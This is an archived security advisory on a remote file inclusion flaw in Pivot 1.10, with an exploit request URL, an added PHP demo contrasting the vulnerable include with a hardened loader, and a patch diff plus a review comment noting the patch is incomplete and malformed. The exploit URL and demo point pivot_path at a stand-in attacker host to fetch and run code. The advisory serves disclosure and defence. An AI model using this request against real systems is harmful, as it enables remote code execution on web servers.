[UNIX] Pivot Remote Code Execution Vulnerability

2004-06-18T00:00:00
ID SECURITYVULNS:DOC:6366
Type securityvulns
Reporter Securityvulns
Modified 2004-06-18T00:00:00

Description

The following security advisory was sent to the SecuriTeam mailing list and can be found on the SecuriTeam web site: http://www.securiteam.com



Pivot Remote Code Execution Vulnerability

SUMMARY

"Pivot is a web-based tool to help you maintain dynamic sites, like weblogs or online journals. Pivot is released under the GPL so it is completely free to use. It is written in PHP, and does not require additional libraries or databases to function." (http://www.pivotlog.net/)

Remote code execution is possible in Pivot through remote file inclusion. PHP code fetched from an attacker-controlled host is executed with the privileges of the user account under which the web server runs Pivot's PHP scripts.

DETAILS

Vulnerable Systems:
 * Pivot version 1.10

Immune Systems:
 * Pivot version 1.14

The vulnerability lies in the class file module_db.php, which can be requested directly by a client. By supplying a fake base path, the attacker can make the script include any file, including one that contains malicious PHP code. That code runs in the context of the user that normally runs the Pivot scripts. The relevant excerpt is shown below:

    // for now, we'll just use the xml / flat-file module..
    include_once $pivot_path."modules/module_db_xml.php";

    class db {

No check or filtering whatsoever is performed in module_db.php; it assumes that it is only included from known locations with $pivot_path already set to a well-formed value. However, the file can also be requested on its own. These two factors together give rise to the security issue.

The file is meant to be included from elsewhere in the code, where $pivot_path has already been set to the installation directory. However, if register_globals is set to On in php.ini, a request parameter named pivot_path becomes the global variable $pivot_path before the include runs, so the attacker can hijack the variable and point it somewhere else (for example "http://xxxxx/"). Because the script appends the fixed suffix "modules/module_db_xml.php", PHP then fetches and executes http://xxxxx/modules/module_db_xml.php from the attacker's server. This requires that the server also permits includes from URLs, which in PHP 4 is governed by allow_url_fopen (PHP 5.2 and later have a separate allow_url_include setting for include/require).

A request exploiting the vulnerability could look like this, where the host named in pivot_path serves a PHP file at modules/module_db_xml.php: http://xxxxx/pivot/modules/module_db.php?pivot_path=http://xxxxxx
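As an added example (not Pivot's code and not from the advisory's author), the following PHP script reproduces the include pattern quoted above, makes the register_globals hijack explicit, and contrasts it with a hardened loader that refuses direct access and accepts only an allow-listed module name resolved inside the install tree. It creates its own temporary directory and a constructed stand-in module file, so it runs offline under a current PHP CLI; the directory layout, the PIVOT_ENTRY constant, the attacker.example hostname and all function names are assumptions made for the illustration.

```php
<?php
// Added example, not Pivot's own code: the vulnerable include pattern from
// module_db.php 1.10 next to a hardened loader. Runs stand-alone with a
// current PHP CLI; directory layout, constant and function names are assumptions.

// --- vulnerable pattern -----------------------------------------------------
// With register_globals=On, PHP creates $pivot_path from ?pivot_path=... before
// any line of the script runs. With allow_url_fopen=On (PHP 4) or
// allow_url_include=On (PHP >= 5.2) an "http://..." base is fetched and
// executed by include_once. Nothing validates the value.
function vulnerable_module_file($pivot_path)
{
    return $pivot_path . "modules/module_db_xml.php";
}

// Makes the register_globals behaviour explicit: every request parameter
// becomes a global variable of the same name (the engine did this implicitly).
function simulate_register_globals(array $request)
{
    foreach ($request as $name => $value) {
        $GLOBALS[$name] = $value;
    }
}

// --- hardened pattern -------------------------------------------------------
// 1. A module refuses to run unless the entry script defined a marker constant,
//    so requesting modules/module_db.php directly does nothing.
// 2. The base directory comes from the caller's fixed install path, never from
//    a variable that request data can populate.
// 3. The only caller-chosen part is a short identifier matched against an
//    allow-list pattern, and realpath() confirms the result lies inside the
//    modules directory.
define('PIVOT_ENTRY', true); // in real use: set by index.php before any include

function safe_module_file($base_dir, $module)
{
    if (!defined('PIVOT_ENTRY')) {
        throw new RuntimeException('module file requested directly');
    }
    if (!preg_match('/^[a-z0-9_]{1,32}$/', $module)) {
        throw new InvalidArgumentException("bad module name: $module");
    }
    $modules = realpath($base_dir . '/modules');
    $file = ($modules === false) ? false
          : realpath($modules . '/module_db_' . $module . '.php');
    if ($file === false || strpos($file, $modules . DIRECTORY_SEPARATOR) !== 0) {
        throw new RuntimeException("no such module inside modules/: $module");
    }
    return $file;
}

// --- demonstration ----------------------------------------------------------
// Constructed install tree in a temporary directory.
$root = sys_get_temp_dir() . '/pivot_demo_' . getmypid();
mkdir("$root/modules", 0700, true);
file_put_contents("$root/modules/module_db_xml.php",
    "<?php\n// constructed stand-in for Pivot's xml module\n\$loaded = 'xml';\n");

// 1. Intended use: the entry script set $pivot_path to the install directory.
$pivot_path = "$root/";
echo "intended:  ", vulnerable_module_file($pivot_path), "\n";

// 2. The advisory's attack: the request carries pivot_path=http://attacker.example/
//    (constructed host). Because the script appends a fixed suffix, the attacker
//    hosts the payload at modules/module_db_xml.php on that server.
simulate_register_globals(['pivot_path' => 'http://attacker.example/']);
echo "hijacked:  ", vulnerable_module_file($GLOBALS['pivot_path']), "\n";

// 3. Hardened loader: a module name is accepted only if it resolves inside
//    $root/modules; URL, traversal and unknown names are rejected before include.
foreach (['xml', 'http://attacker.example/', '../../etc/passwd', 'mysql'] as $m) {
    try {
        $f = safe_module_file($root, $m);
        include_once $f;
        echo "allowed:   $m -> $f (loaded=$loaded)\n";
    } catch (Exception $e) {
        echo "rejected:  $m (", $e->getMessage(), ")\n";
    }
}

unlink("$root/modules/module_db_xml.php");
rmdir("$root/modules");
rmdir($root);
```

Run it with the php command-line binary. The first two output lines show the same concatenation yielding a local path and then a remote URL once the request parameter has become $pivot_path; the remaining lines show the allow-listed name loading and the URL, traversal and unknown names being rejected before any include runs. The important design choice is that the hardened loader never derives the include base from a variable, so it stays safe whatever register_globals and allow_url_fopen are set to.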

Patch Availability: A new version of Pivot is available for download. Users are highly advised to perform the transition. If for some reason they choose not to, the following fix can be applied to remedy the situation: --- module_db.php Wed Feb 11 16:29:04 2004 +++ module_db.phpfix Fri May 28 22:36:07 2004 @@ -10,6 +10,10 @@ // Patch to fix remote include - loofus (0x90) //

+/ Make sure user cannot include remote files / +if(isset($_GET['pivot_path']) || isset($_POST['pivot_path']) || isset($_COOKIE['pivot_path'])) + die("No remote include for you!\n"); + // for now, we'll just use the xml / flat-file module.. include_once $pivot_path."modules/module_db_xml.php";
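Review bot: the guard added in this hunk keys on where pivot_path arrived from ($_GET, $_POST, $_COOKIE) rather than removing the script's dependence on a request-controllable variable; any other source register_globals draws from (environment or server variables, depending on variables_order) is not covered, and the file still does nothing to stop being requested directly when the parameter is absent. A sturdier fix is to set $pivot_path from a fixed value in the script, or to have the entry script define a marker constant that module_db.php checks with defined() before the include_once, so that a direct request is refused regardless of php.ini. Also, the added comment line reads `+/ Make sure user cannot include remote files /`, which is not a valid PHP comment and would be a parse error as shown; it should read `/* Make sure user cannot include remote files */`.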

ADDITIONAL INFORMATION

The information has been provided by loofus.


DISCLAIMER: The information in this bulletin is provided "AS IS" without warranty of any kind. In no event shall we be liable for any damages whatsoever including direct, indirect, incidental, consequential, loss of business profits or special damages.